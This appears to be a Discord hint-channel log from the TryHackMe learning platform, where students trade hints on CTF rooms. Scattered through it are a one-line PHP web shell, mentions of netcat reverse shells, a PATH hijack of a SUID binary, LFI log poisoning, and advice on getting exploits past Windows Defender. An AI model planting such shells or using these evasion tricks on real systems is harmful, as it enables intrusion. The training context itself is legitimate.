#room-hints
maybe the ver of nc that is installed is the ver that has that flag removed??
what do you mean?
there are 2 versions i dont know which is new or old but one ver has that flag the other ver removed that flag
what flag are you talking about
||-e||
i used the long version of nc reverse shell from pentestmonkey's cheat sheet
i used it too but it didn't work somehow
the bash one worked tho
need some help in the cc: pen testing room
ok
didnt know that but i do know sometimes its there and sometimes its not
like you said depends on how it was compiled
Hey, can someone explain to me what happens when you add a domain in the /etc/hosts file? (I am trying out the archangel room)
I googled for you cos it would be faster than explaining
You may want to review a website with a custom domain name before the domain is publicly mapped to the website. For example, a domain name will often be routed to a live site while development is o...
this mostly covers it
Got it thanks man
so it's simply a redirect for an IP to a domain name irrespective of taking it from the DNS records correct?
Ok yeah got it, that's a wrong word.
Understood.
Hi there
Room Nmap
Task 14
Xmas Scan
i run the command for scan but i dont get any result
namp -sX -p 0-1000 "target machine"
the ip may have been expired
or you did that scan too early
it's buggy sometimes
well if you think about the question
Perform an Xmas scan on the first 999 ports of the target -- how many ports are shown to be open or filtered?
based on the result you got, what do you think a possible answer could be
Thank you, the guys gave the clue about what's going on
Hi guys...
Any help on Linux Agency mission25? I'm trying for an hour now, but nothing...
||The only strange thing is in .viminfo file, missing a "5 LINE :||
what's a word used for when you move goods out of a country? you ________ them
||export || ?
then once you have that word, think of how it's used in linux
and maybe try using || ltrace || when you run the binary
hmmm.... I'll give it a try. That's the problem when English is not your native language
|| ltrace || gives you everything you need
I'm using smbclient on a kali vm, any idea how I would open this file, Working From Home Information.txt ?
It doesn't seem to be liking the fact there are spaces in the title of it 
you have to escape the spaces, that is, put a \ before them
so "My file name" becomes "My\ file\ name"
graaah toc2 is teasing me. I am sure I have the right way of getting the foothold but not working as expecting (just letting steam out here - I know rule13)
keep at it, you'll get there
hopefully. I am missing some piece of the puzzle.
Awesome cheers!
I think I'm over thinking this one - the rest of the questions seem rather easy but finding who the profile folder belongs to is confusing me like mad
ahh got it D'OH! spelling bleeping error
it happens, i was doing one of the boxes recently and kept on killing the server with a wrong log poisoning attack, over and over and over and ...
sounds like one of the new boxes a few days back
yup, was a typo in my attack, must have read it and reread it a half dozen times before I noticed lol
hi, guys im doing the dogcat room
i used gobuster and found a directory called flag.php but it's empty
i tried LFI but nothing helps
what should i be doing?
more LFI
that is the way
if you want a bigger hint then || sometimes you have to go forward to go back ||
lol
that's where my second clue comes in
there is a way with LFI to pull out the source of a file with ||base64||, try googling for it
i tried that too but it didn't work
there's a link "http://10.10.213.207/?view=dog"
and another "http://10.10.213.207/flag.php"
i tried all the exploits on the dog one
can i do something with the flag?
did you find any directories when you gobusted?
and no, the flag.php will be needed later, this is not the way
what message do you get when you try to do lots of ../ + etc/passwd?
Sorry, only dogs or cats are allowed.
ok, so that's a message coming from the code right, must be some sort of check on what you entered
oh
now re-read my first spoiler-marked hint again
toc2
Not yet.
oops didn't mean to type in discord
ugggg don't you just love it when you are in the middle of compiling an exploit to upload to a machine and the time expires on a deployed machine
when running the root script on chocolatefactory, || do I need to enter the 'key' in its decoded format? or enter it as is ||
ah it worked, ||turns out I needed to enclose it in quotes ||
encoded or decoded?
as is
i thought so just wasn't 100% positive
@frank snow strings is good for you
hello brothers
i really need some help
i am new to try hack me
working on cyber defence
and stuck on sysinternals question about streams
#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:
- What room you are on
- At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
- What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
sorry.
I need assistance on:
Network Services 2
Task 10
Question "Now we need to crack the password! Lets try John..."
What i have done:
||Taken the hash EA031893AA21444B170FC2162A56978B8CEECE18 saved it as a .txt. ran the hash through hash-identifier showing SHA-1 & MySQL5. From this I ran the hash.txt against john the ripper sudo john --format=raw-sha1 --wordlist=/usr/share/wordlists/rockyou.txt /home/joe/Documents/mysql_hack/hash.txt however i just get a scrambled mess. So I try john hash.txt but it never finds it.||
Any assistance is greatly appreciated.
From what you've given you've missed a * off the hash. You might also use ||mysql-sha1|| as the format. Fix those and it should crack in seconds
Thank you, I was going round in circles and thought the * had no significance which is why i removed it.
All the little things matter - The Wire
I am curious does every hash need to start with a * before running it through John? or is it just certain hashes?
Nope. They come in many forms and sizes.
brilliant, I'll update my notes
Try Hack Me has a few good hash cracking boxes which will show you more.
I cannot find a room called 'linux agency' PSB
#room-hints message
Unfortunately I cannot help as I have not completed that room, but im sure that someone might be able to assist you. Thank you for providing the link.
Ok
Hint is don't follow any write-ups you might find as it's changed
Ok I'm really stuck in flag25 @ LinuxAgency. All other flags, found easy in a matter of seconds. But this is hard, at least for me. Not even with the || ltrace || hint I've got from here.
same here, tried giving an argument to the binary, but nothing. I don't have to analyze it with Ghidra, do I ? Seems too complex compared to the flags before
seems to have to do something with ||ltrace|| command, but I cannot find what.
says there is no such command
Its a php thing, you see it when using ||ltrace|| on the bribe binary
grrrr ... any other option? I still don't get it
So you know what ||getenv|| does?
I google it. I found ||ltrace -e getenc ./binary||
I mean that you have to find out what it does in the binary, or in php in general
I'll search more....
just typing in the command in google and reading the first lines of the first result did it for me @sleek wolf
which command do you mean?
||getenv||
I know I'm close but...
Hey guys!
I'm doing AoC2 day 14, and already found the pictures from Rudolphs parade, but I can't find any exif location data, I've already tried reverse image searching for higher resolution images, but none of them had the location data, any hints?
@sour lintel try first off using https://29a.ch/photo-forensics/#error-level-analysis it has a few tools that can help maybe (it has geo tools)
There's a higher resolution image elsewhere on the page iirc
Good, I'll find that!
I didn't use the hint but now the hint given on Tryhackme itself does the job..
good work. I might go back and try that 3rd way later!
You did by rev engg tools ??
Hey, I am having trouble answering a question in a Sysmon room. It is the Task 4 question: "What is the UTC time created of the first network event in C:\Users\THM-Analyst\Desktop\Scenarios\Practice\Filtering.evtx".
I have run this command: ||Get-WinEvent -Path C:\Users\THM-Analyst\Desktop\Scenarios\Practice\Filtering.evtx -FilterXPath '*/System/EventID=3' -MaxEvents 1 -Oldest||
It returns: ||1/6/2021 1:35:52 AM||, but it is not the correct answer.
If I run Get-TimeZone, it returns UTC so shouldn't need any time conversion.
Placeholder for the question is: ********** :**:**.***, which is a bit weird.
So I have tried filling in the zeros like so ||01/06/2021 01:35:52 AM||, but that is still wrong.
Then I tried ||01/06/2021 01:35:52.UTC||, no success. I also tried swapping year, day, month around but still nothing. Oh, and I have also tried putting in the newest log time with that filter and no luck. Any suggestions?
Yup. Not the smartest way, but ultimately effective.
how can i take advantage of a custom SUID?
Need to find out what it does to see if the suid has any exploitable behaviour.
it uses || date, so i edited the path and ran my own "date" script which invokes a bash shell||
thanks for the help
just a heads up, that's a little spoilery for this room
Hello there. Need some help in the Room: Relevant - pentesting challenge. I found out a way of reaching nt authority based on a set of priv available and i have indeed an exploit. But for some reason it doesn't run in the machine. I compiled it to 32 and 64 versions but none of those run on the machine (but it runs locally). Any help is appreciated.
it's almost as if windows had some sort of protection against privilege escalation
try running this command ||powershell Get-MpThreatDetection|| and see if you can find your executable on the list
it returns empty :\
but i do have a certain message: The system cannot execute the specified program.
ok, basically windows defender blocks those commands
so you need to keep googling for a more recent exploit that isn't detected
ok, that's a mess, let me try again lol
careful with the dir :p
If a password hash starts with $6$, what format is it (Unix variant)?
ActionSuccess : True
AdditionalActionsBitMask : 0
AMProductVersion : 4.10.14393.0
CleaningActionID : 2
CurrentThreatExecutionStatusID : 1
DetectionID : {478980A0-C8B8-4D26-9C01-E651A73C41BC}
DetectionSourceTypeID : 3
DomainUser : IIS APPPOOL\DefaultAppPool
InitialDetectionTime : 8/24/2020 1:42:58 PM
LastThreatStatusChangeTime : 8/24/2020 1:44:04 PM
ProcessName : C:\Windows\System32\cmd.exe
RemediationTime : 8/24/2020 1:44:04 PM
Resources : {file:_C:\inetpub\wwwroot\XXXXXXX\JuicyPotato
.exe}
ThreatID : 2147757908
ThreatStatusErrorCode : -2142207965
ThreatStatusID : 3
PSComputerName :
it is weird because if i try to run it in the PS i get 'failed to run: The file or directory is corrupted
and unreadableAt line:1 char:1'
If a password hash starts with $6$, what format is it (Unix variant)?
You can find it in hashcat example hashes page
not sure why that is. Keep looking and you'll find another exploit that needs compiling, post here and i have a link to an already compiled version
roger that, will try to find another one
Anyone to help with MITRE ROOM. Task 7. Last 2 questions
For the crack the hash 1 room
For the bcrypt hash, the hint specifies trying "other methods that start with b"
Its just none of the other methods that start with 'b' make sense for the hash. Like the example hash doesn't line up with the question hash
I can't finish day 14 of AoC, as I need to access Scylla.so and it's down, is there another alternative (that it's free?)
Or maybe I could get to the leaks myself, I've found half the password in BreachDirectory, but this is it...
Actually, I've sent a message to the maintainer of Scylla but still didn't get any response (I believe that is way too much isn't it?)
Both the answers are there on the site. The first one is written in a block of text so you have to read carefully to pick it out. The second, there are boxes on each page listing the affected platforms. Look there
Thanks, I will read the text once again
every time i terminate my machine and redeploy it in linux agency task 4 i have to privesc -4 users every time to get the next one. is it the only way to do that or are there any other ways to log in as the user where we terminated the machine? also i know the flags of all the previous users
you can check what users can SSH into the box, then once you get one of those you can go straight to it, just tail /etc/ssh/sshd_config
some more explanation would be really helpful
more explanation on what? did you tail the sshd_config file?
how to check what users can ssh into the box
but that's what the command I gave you does
if you run it you'll find a list of users that can SSH in
ohh ok sorry thanks
will i be able to get the shell of users if they are there, and if they are not do i have to start from viktor and continue privesc till the user where i terminated the machine
no, if a user is on that list and you have already found their password then you can go in directly as that user
sure thanks a lot
hi how did you fix the issue? any idea what is causing?
@median compass got it
tried to get a compiled version of my exploit (after trying to bypass applocker) and found a version of it
for some reason my own compiled version gets locked
and this one doesnt
=\
defender is looking for encoded sequences, if enough people use msfvenom (or whatever) to encode an exploit then the same strings get created and eventually associated with the exploit. a different encoding or way of doing something can then slip past until it in turn gets well known and used often
yeah but in my case i just grabbed the project and compiled the exe
same size, same arch
the one i got after searching is the same thing, so something i am doing in VS is flagging it
maybe because i am using a newer windows sdk or something
(the project from the exploit)
anyway, thank you vm for the help
from what i can remember, i finally used another tool.
Do not provide or ask for help or hints for Classic Passwd room until 10th Feb, 7pm (GMT)
No. From Viktor to Penelope you're flying without authentication. Drop out and you have to go back to Viktor and privesc through each user in turn. Most of them should be solved pretty quickly tbh, if you don't make a drama out of it.
Does anyone know if hydra is possible to use on Jenkins? (doing Internal room rn) but yeah when i cURL i get a Crumb error which supposedly is linked to the current user session but nothing appears in dev console, so it's server side?
The catch is - you don't have the passwords until you get given one later, so it's a bit of a moot point.
Eh... Hydra should be a last resort
I'll just use Zap i guess
hey does anyone know if in "The Marketplace" room we need to use hash cracking for the bcrypt hash?
@carmine frigate no cracking required
just rooted the "BioHazard" box, and I dunno if I'm just being stupid but I can't answer one of the last questions to be able to mark the box as complete...
@quartz grove should just be the root flag, no?
no, it was lame... I just figured it out
it wasn't the root flag it was one of the questions
Glad you did. Im actually gonna do that room, looks interesting
it was OK, bit too CTFy though
Oh well. Root it anyways.
waaay ahead of you
<?php system($GET_['cmd'])?>
what does that do?
does there have to be a cmd file for that to work
basically just spawns a cmd process as a GET request
I got at the ||cms installation page|| on toc2 any hints what to do further
when you do anything with php and you don't understand it, search for it, read the php docs at php.net.
if you input: ls and that mean: $_GET['cmd'] = ls, code will be: <?php system('ls') ?>
in linux, this command will list all files and directories in your directory
@candid nimbus I tried but no luck. Please share the link which you are referring to. I am doing something terribly wrong. Stupid to ask but I am looking for answers
I think that's still embargoed until later today. Might be a good exercise to fill in the time by researching the app and see what you can find out about it.
thanks i was making sure the same in my query i make a lot of typos so i keep losing the shell
it's still a bit early I think
Okayyy no problem will give it another grind
So you should have found an attack group and something you should focus on. If you click the link for the something you should focus on there is literally a one liner that contains the 1st answer. The 2nd answer is in the box at the top on the right.
Ok, glad I asked before spitting out the link. Thanks @stuck fractal
Rule #14... gotcha. slaps own hand
I suggest trying out https://tryhackme.com/room/lfibasics
it does teach you about 'directory traversal' but you should recognise it a bit as 'path' like if you cd ".." it takes you back a level
seems to be a common technique in LFI based vulnerabilities (I haven't done archangel yet, never gonna give it up tho).
There is nothing to look for bro
Still thank you
Thanks a billion. I got it and also the mistake of looking for inside RULER instead of CLOUD Accounts
you can read the source code of the page you're accessing, using LFI
sure, pm
I deleted that because it was a massive spoiler.
Hi
Hi guys, i am doing the beginner ctf called "linux Challenges". I already have a problem with finding flag3. The question is: Flag 3 is located where bob's bash history gets stored? - isn't it stored in /home/bob/ ?
oh, you're right. sorry i will change it in my question
It's stored in that folder, sure
I cant send dpic's but it's not there
That is the correct folder. But you need to look in a file.
sorry, but i have to ask again. I do not get the right "find" command to get flag5 of "Linux Challenge", can somebody give me a hint? These are some of my tries: find /, find /home/bob, find/home/garry, find / -name flag5, find / -perm g=w,...
What's the task, sorry?
Find and retrieve flag 5. xD
Well, knowing the name of the file is hard and essentially the key here.
First, I would highly suggest to put 2>/dev/null on the end of your find commands as this will filter out all the Permission denied errors.
As you do not know the flag file name, I would suggest using the third command but replace the file name with flag to widen your search, if it does not find a file named flag5.
thank you so much. I will try get the flag with this information.
got it, my fault was to search for -name flag5 and not -name flag5.txt
Hah, completely missed that.
now i've learned it xD
Hi guys
What means "send money to another country"
I am trying to solve mission25 in Linux agency room
If you are still stuck on it, it is a play on words for an app that can be used to transfer money
hello all, anyone available to help with the Sysinternals room?
Which bit are you stuck on?
"Using WHOIS tools, what is the ISP/Organization for the remote address in the screenshots above? "
I tried the both addresses in the screenshot but the lookup fails
when I try, it returns "The requested name is valid, but no data of the requested type was found."
Hmm, never had that problem when testing it, maybe use an online whois tool
huh..thanks! That did the trick
I used domaintools and it worked...wonder why it didn't work on cmd
well thanks ^_^
@astral smelt any advice on why the last question won't accept the correct path?
I am still stuck on ... I am not sure. Someone told me it is a similar procedure to export but not clear ...
nvm about my issue...I fixed it
This stumped me for a bit too... maybe look at the .viminfo file. Read the code and try to figure out what it's trying to "compare"...
It puts the money in the pocket :)
Any hints for classicpasswd??
It's not open for hints yet
72 hours from release
Reverse engineering is hard
Do a try hack me reverse engineering box in the meantime then. Should teach you everything you need to know
go do one of the other RE rooms and get acquainted with the tools. They will do most of the work for you in the classicpassword room and make it easy for you to solve
Hey people!!
Did someone manage to solve the physical security intro room?
I am at the last question, the one about Adams Rite Hardware and I don't get it. I mean I know what to do to prevent the bypass but I can't find the word for it. I am also not an English native so that makes it a bit tougher.
Anyway, really cool room but super hard to solve
Hints are really appreciated
It has to do with what a knight would carry .. and is on some types of Cat cable
I would go with rockyou
Thank you ❤
anybody help me out with overpass 3 having trouble ||mounting the share|| tells me ||nfs file type and transmission protocol|| are not valid
Search here in this discord server for that question, there are big hints around
It's in my rockyou.txt 100.
Thanks ❤
Woopie I found the answer, thanks to both of you ❤
||mnemonic room . i am stuck after sshing into james . still dont know what this supposed to mean . HINT ! ||
nvm found it
Hey, I have a question about Simple CTF room
Hello guys, can anyone give a nudge for retro?
Which part are you on?
found hidden directory and now enumerating but couldn't find any useful thing ):
If you keep looking you will ||find creds on that secret directory ||
thx for the nudge will do
Do the exploits from searchsploit need to be edited for syntax?
In the Simple CTF room?
No matter what version of python I run it on, it gives syntax errors and won't actually do anything.
IIRC that's python2 for SimpleCTF
Read the error.
If you don't know the error, google it
Because that one very clearly is not a syntax error
Ok, so it's missing a module. Seems weird for a THM Attack Box.
As many different exploits require different modules, the AttackBox dev (CMNatic) isn't going to install them all, you can request it in the feedback form although #feedback-and-ideas
Awesome, thanks!
if you don't mind I would be interested in seeing your cnsms.py code
It's the code from searchsploit. I just copied it and renamed it to something easier to remember.
ok was just curious cause if its the room i think it is i don't remember using searchsploit
What'd you use?
if its the room i think it is i just installed the cms to get revshell then lxd to priv esc to root
lol i was just curious cause it was an interesting command you were running
Ahh, ok! One sec.
cool
i am doing the Linux Challenges in Linux Fundamentals. I am searching for flag 23. I found it but i have to reverse it. I don't know how to do so. Can somebody give me a hint?
There's a command you can use to reverse it and please don't post flags
thank you, i will search for it.
Anybody for hint on the first question on the AWK section in the room https://tryhackme.com/room/linuxmodules ? I got the second one already, and the first one I get the same output than the question asks for but the first curly braces contain 6 extra characters I'm not using and can't figure them out. Tried reading the manpage of awk and the tutorials the creator links in the exercise but there is no way I can figure the answer out
^^^ ah nvm, finally got it lol
i found a filter.php file in the "upload vulnerability" room, how do i look at the source code
or is this a rabbit hole, me trying to get this file ?
can I get some hint on Linux Modules https://tryhackme.com/room/linuxmodules task 09? I have used sort and uniq and cat them with '-n' flag. But I keep getting the 2271st word and the line number of word 'michele' not correct. I checked the result and words are sorted. Find it a little hard to figure out what I missed
ok nvm, I solve it with kali linux. Originally I tried this on wsl ubuntu and the sorted result seems to be different from different os. idk, maybe I should take some time on those
okay now i got it. Its my $LANG being 'C.UTF-8'. I changed it to 'en_US.UTF-8' and I get the different result. anyway this is a very good room to learn and play
does anyone have idea about this ? It's in the Convert my video room !! Tried www-data , apache but didn't work
what other users are on the box
cat /etc/passwd | grep sh is a good trick to see anyone who has capabilities of getting a shell
@blissful musk
@storm venture tried all those users, but it didn't have the correct one !!
that's odd
the number of characters doesn't nearly match any of those users
are you sure there's not another account on the box
you could also do ls -la /folder/.. | grep folder to see who owns it?
has anyone tried toc2, I'm stuck at root and can't understand the ||readcreds.c|| code
@storm venture Got it !! There was a hidden file in which there was the username, thanks for helping out
nvm got root, with the intended way
ayy nice, good job @blissful musk
i could never get that race condition to work but its not needed to complete the room
Would love to know the way you got root
user is part of a certain group that is easily exploited
Glad you liked it
Interesting. I just poisoned the config.php file during install and got a shell that way.
Hmm...another interesting technique that I'll have to look into.
Took me a bit of fiddling and moving args around to get them accepted. Creating the commands was pretty easy - getting them accepted was the hard part
lol nice!
I never even noticed it at first and did it the same way as you. Had to redo the room to get a bit of the race fun. It seems like it does not work if you point it to read the link but will work OK with the actual file. Dunno why, because the video shows the opposite.
oh ok i was going off what liveoverflow was doing in his video will try again when i get home from work tonight
At least that was my experience when trying
for the network services 2 room
"Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?"
what command should I be using for that?
nvm
kinda confusing cause just ||showmount -e [ip]|| worked
the /usr/bin/showmount is the absolute path; if /usr/bin/ is in your $PATH then you can just use the relative path with "showmount"
Alright, thanks Knight
Well known ports? Says 0-1023 online but when I type it in says wrong, any suggestions
Typed 1024 it worked
not complaining just explaining: if you do a which showmount and it shows somewhere else than the relative PATH that they are telling you to use, it won't work. just saying, not judging
i know typing is not my strong suit lol
good day all, got a question about OWASP top 10 task 18 part 3.... Is it broken? Because outside of the first page they DIRECT me to, every other page I try comes up blank, got all the way to 100.... BLANK
Anyone else have this issue?
also after x amount of tries the room just stops responding
I got the answer i needed but why did running the same command twice produce different results what is the reason for this? here's the permission changes from download to me reaching the desired result
the last two images are the ones in question
its something to do with suid permissions
's' If the setuid or setgid bit and the corresponding executable bit are both set.
'S' If the setuid or setgid bit is set but the corresponding executable bit is not set.
now as to why you would have to run the command twice for it to go from nothing > S > s I'm not 100% but it's probably related to how they work
maybe because you didn't specify +xs
Hi guys,
I am at the beginner Pickle Rick room.
So far I:
||looked around with a browser and found:
In / (root) there is a comment with username:
R1ckRul3s
Server:
Apache/2.4.18 (Ubuntu) Server
(I searched about this version and found that it is vulnerable but no exploits in exploit-db)
=======
used nmap and found:
open ports:
22 ssh
80 http/website
hidden directories:
/assets not hidden, but it is a directory
/robot.txt nothing interesting
/login.php input fields
=======
used Burp Suite Community Edition (free) (learned to use Proxy and Intruder from outside sources due to paywall in THM):
basic SQL injections didn't work in /login.php:
' or 1=1--
R1ckRul3s'--
DOM-based XSS not working
XXE not working (or at least I think so)
no cookies that are revealing anything
right now I am at the painful process of brute forcing using intruder which stops searching after ~70 tries (and I have to manually remove the tried passwords, cancel the unmoving attack and start a new attack) because it is the free version. I am using best1050.txt. At the time of writing it reached letter m but I doubt brute forcing will yield a result at all.
=======||
Right now I am kinda stuck.
Please point me in the right direction.
Is there something I am missing?
Thanks in Advance!
Are you sure robots.txt isn't interesting?
BURRRRRRRRRRP! I think morty you need to check the robots! they have guns!
||no way this is a password|| let me check
lesson learned, thanks!
hey i have a base64 executable file i have to decode, there was a cmd to do so starting from echo, can anyone tell me that cmd
Room task question.
i am on linux agency task 4 maya flag, i want to decode an executable base64 file, how to do it
does the normal base64 -d not work?
@distant tartan
or does it not work with executables?
i did it although thANKS FOR HELP
a vs caps lock
HAHA
i had to set up a variable to the file to execute it from simple echo 'base_64' | base64
Do not provide or ask for help or hints for En-pass room until 13th Feb, 7pm (GMT)
hey guys i need some help in nessus room
i deployed the machine and ran the basic network scan
and only 3 vuln got displayed
i did the scan couple of times but i cant see the port scanner option anywhere or any apache server version
plz help
what are you using? nmap? you can do sudo nmap -sV -sC <ip here>
im using nessus
idk then im only good with nmap i can go look around tho
that would be great then
btw what vuln info are you gathering, or are you just trying to see all of it
the question said that port scanner tab will be displayed where it should display the apache version
but i didnt get any tab
I can just give you a few common versions of apache used in ctfs
2.4 is common..
the problem is that it should be displayed
why isnt it
what did i do wrong
idk... can you send me the challenge link
yeah
uhh new room today.
while I'm checking, go around looking for apache versions I think it might be something like 2.3.xx 2.4.xx
yeah sure
or like 2.xx.xx but its probably 2 as the first number
@tranquil ivy what's the ip you're trying to scan?
@tranquil ivy also what version of nessus are you running?
the victim ip
8.13.1
ight
yeah
have any of the apache versions worked ?
rn I'm getting my nessus set up
nope
odd...
how long did you wait while it was scanning
around 8 mins
@tranquil ivy odd I just scanned and looked through somethings and found apache version ||2.4.99||
^^^^^^ and it works use ^^^^^^^
how what did u do???
u used nessus???
ye i used nessus, idk what
i did i just randomly did stuff
that was my first time using it, but i guess it worked
how
well I did a scan and I went to a nessus tutorial and clicked a few things and found it
what did u get in the scan output?
how do I check that? I closed my vm
home page
btw it should have had all the info
on the challenge page
hmmm
here I'll go screenshot the output
btw if you need to theres always no harm in going to writeups @tranquil ivy
i did but the outputs were different displayed than what i had
doing same steps
heh nice to see that I am not the only one finding the new room more difficult than the label... one got through so far.
here did you get this ?
Hey guys I am trying the Linux Modules room and at task 6 at the first question I managed to have that output but it doesn't accept my answer and my answer differs from the placeholder.. Any help ?
nope
well basically inside that there's an apache version vuln you can check and find it
yeah but i didnt get this
output
did you do a basic scan, have schedule enabled, and did you scan a lot of ports or just a few?
basic scan
all ports
did you look inside the results the scan gave you, they could be in there.
checked everything
no result
odd......
can you do the scan again quickly and I'll walk you through it?
yeah ok
btw did you do a host discovery scan?
and basic network scan after that?
then do credentialed patch audit
@tranquil ivy and when you do basic network scan do patch audit scan then a web application test if that doesnt work btw

did it work?
doing
mmk
btw just dm me if you need anymore challenge help, I'm not on often tho
^οΉ^
yeah sure will
ight I'm gonna go help the guy in room help bye!
yeah bye
n thnx
must be too tired for the new en-pass room. I am missing something obvious. It is supposed to be easy
@gusty kite same here
suspect it is just in front of us - laughing
you and everyone else who tried. There is no way no one could have found a solution in an easy room
🤷‍♂️
Yep not really speaking for good room quality IDK
but one person finished.
That makes it even more weird IMO
yeah
stuck too..... think it should be medium from the bits I have done so far :/
The only "hint" we got is that we are missing something really obvious, so i don't know how could i help you since only one has rooted the box
Is anyone on the en-pass room
Check the latest pinned message!
middle icon
Hi can someone give me a hint for root on gatekeeper by themayor?
top right beside the search bar
Yeah i saw it
What do you have so far?
I was talking to elbee @green brook
@light hemlock ive got my shell, ive used winPeas and metasploit exploit suggester, just having trouble finding the privesc point and ive enumerated a lot.... must be missing something

@cursive star @gusty kite, mind DMing me with what you're doing in enpass?
I can check against the writeup to see if there's a problem with it
I got it @inland onyx thanks!
Awesome
Can I DM? @inland onyx
You can, but if it's confirmed to be working then there won't be any hints
No I'm not asking for hints
I got the 1st part though in a way I didn't like. I'll explain more in DM
maybe you can help!
In the burpsuite room the instructions say "Parse through the various responses we've received from Juice Shop until you find one that includes a 'Set-Cookie' header."
I can't find any with 'Set-Cookie', only 'Cookie'.
Have I done something wrong in a previous step or is 'Cookie' and 'Set-Cookie' the same?
It sounds like you're looking through your requests instead of the responses
Oh, thanks.
anyone on En-Pass room ?
I hit a bit of a snag on it myself, so I'm setting it aside. But, since it's a newly released room there's the no help/hints policy in place.
ok
dm
I'm also stuck with the pass in hand from reg...
Don't know what's wrong but the "windows/smb/ms17_010_eternalblue" exploit is failing constantly in the Blue room's target VM
does anybody have any idea what to do there ?
Similar thing happened to me a few days ago...I left it as I thought i would come back to it
same
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
ohhh So before time it is not possible?
No. You're just not allowed to ask for help or hints before 72 hours have passed
opsss sorry. Thanks for the rule.
yeah, I've had a couple of issues with it, how can I help though?
I think we can agree that this part is not properly implemented just a “fake” implementation.
I've got a thing but am missing one critical piece of info
I'm assuming that the encoded bit is useful, but doesn't seem to be
lol, yes!!
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
@crisp burrow Don't ask for help or hints until 72 hours have passed please
Please don't ask the same question across multiple channels
@white salmon I'm on En-pass atm
What command can we run to find out more information regarding the current user? in meterpreter shell and it is a windows machine
I am in the metasploit room
should I specifically search for meterpreter shell or windows cmd commands?
You're in a meterpreter
yup
I recommended a page to look for.
got a page of kali for meterpreter basics
Ok, so have a read
Research involves a lot of reading and googling
And you NEED to do it before asking here
Thanx that u did not help got the ans
That's incredibly rude
yeah I did it but nothing much on google
There's plenty.
You should be doing research before asking here. Rule 13.
kk will remember that
It is tho
are we able to ask for hints yet on Linux modules room?
Yes
Yep, it's a walkthrough
need a hint for task 6 Download the above given file, and use awk command to print the following output:
ippsec:34024
john:50024
thecybermentor:25923
liveoverflow:45345
nahamsec:12365
stok:1234
i put
awk 'BEGIN{OFS=":"} {print $1,$4}' awk.txt
and it had given me the result.. but it seems not to be correct for the question
that query did output ippsec:34024
john:50024
thecybermentor:25923
liveoverflow:45345
nahamsec:12365
stok:1234
Yes, I added a hint for that... You need to use FS before OFS. It isn't required tho... But I added it to the solution because I want the others to practice using FS variable too.
i been stuck on it for past 2 days
If you remember, FS is used as a field separator... for inputting the data from either stdin or a file (may be redirection)
is that your room? great room btw, very handy info!
thanx ❤️
No need to be stuck, just append FS=" " before the OFS command
and it will accept the answer
cool.. thanks for that
np
i had been looking at hour long videos on AWK and that and racking my brain bad
on youtube
thanks for that !
hey, which is good... coz i think you must have gained a lot then
yeah a bit i guess
more the merrier, ping me anytime if you need any more help
Hey can you give a hint for task 9, second scenario
I'm getting the result crct but not able to pass the question
what command did you exactly run?
ls | carga -n1 -t -I word sh -c '{ echo word >> shortrockyou.txt; rm word; }'
xargs*
What task were you on exactly?
Your friend trying to run multiple commands in one line, and wanting to create a short version of rockyou.txt, messed up by creating files instead of redirecting the output into "shortrockyou". Now he messed up his home directory by creating a ton of files. He deleted rockyou wordlist in that one liner and can't seem to download it and do all that long process again.
He now seeks help from you, to create the wordlist and remove those extra files in his directory. You being a pro in linux, show him how it's done in one liner way.
Use the following flags in ASCII order:
Take argument as "word"
Verbose
Max number of arguments should be 1 in for each file
that's task 8
oh I'm so sorry
I gave the instructions to arrange the flags in ASCII ORDER.
oh sorry!!
just put them in order... and submit the answer
okay thanks a lot!
np
Any hint on Enpass question 1
!rule 13
Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.
Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.
Im on En-pass, got the first step, but now I am stuck
Could you be more precise about what you tried, what you don't understand etc.
ummmm, trying to frame it without giving anything away
rule13
yea, exactly
I'm also stuck there
You're not allowed to ask for help or hints yet @uneven bane
yeah just don't do it in the channel that is used to ask for hints
Otherwise, by context, it looks like you're asking for a hint
understood, I will take it to general
I'm using the vm available through the website and keep getting an error when trying to initialize metasploit.
tried finding another user to su to but I don't see any available in /etc/passwd
any hints?
You don't need to init msf
It's already done
still giving me issue
You don't need to start the db either
can i dm?
not for en-pass
lol got something which i'm not sure of
sure, but the room is currently under embargo
alright
try harder
hey guys, is there anyone available to help me with the lfi part in the archangel machine?
Can i dm?
where you are stuck
you can ask here
look up log poisoning
can you climb the tree to ../../../../../../etc/passwd
https://book.hacktricks.xyz/pentesting-web/file-inclusion this'll have some ideas
Im new in here is there a way to team up with someone when you get stuck
One second
Thanks
Anyone have a good list of User-Agents that can be used to fuzz user-agent header in Burp Intruder?
Is this for a tryhackme room? @digital bolt
Yes and No, try to fuzz something in ||En-Pass|| room
seclists / Fuzzing / User-Agents
Thanks
Stuck at a point in room enpass , anyone available for dm?
still not 72 hours since release
When was it released
#announcements yesterday
Ahhh ok ...gotta hustle myself I guess
hi. did anyone manage to gain a reverse shell in the room what the shell on the windows machine using powershell? i got a php backdoor going, commands are working fine, it just wont connect back to me. could anyone point me in the right direction?
show us what you're doing, you can surround your screenshots/commands with spoiler tags (double | pipe)
i've gotten to the point where i'm able to send commands and receive output like this:
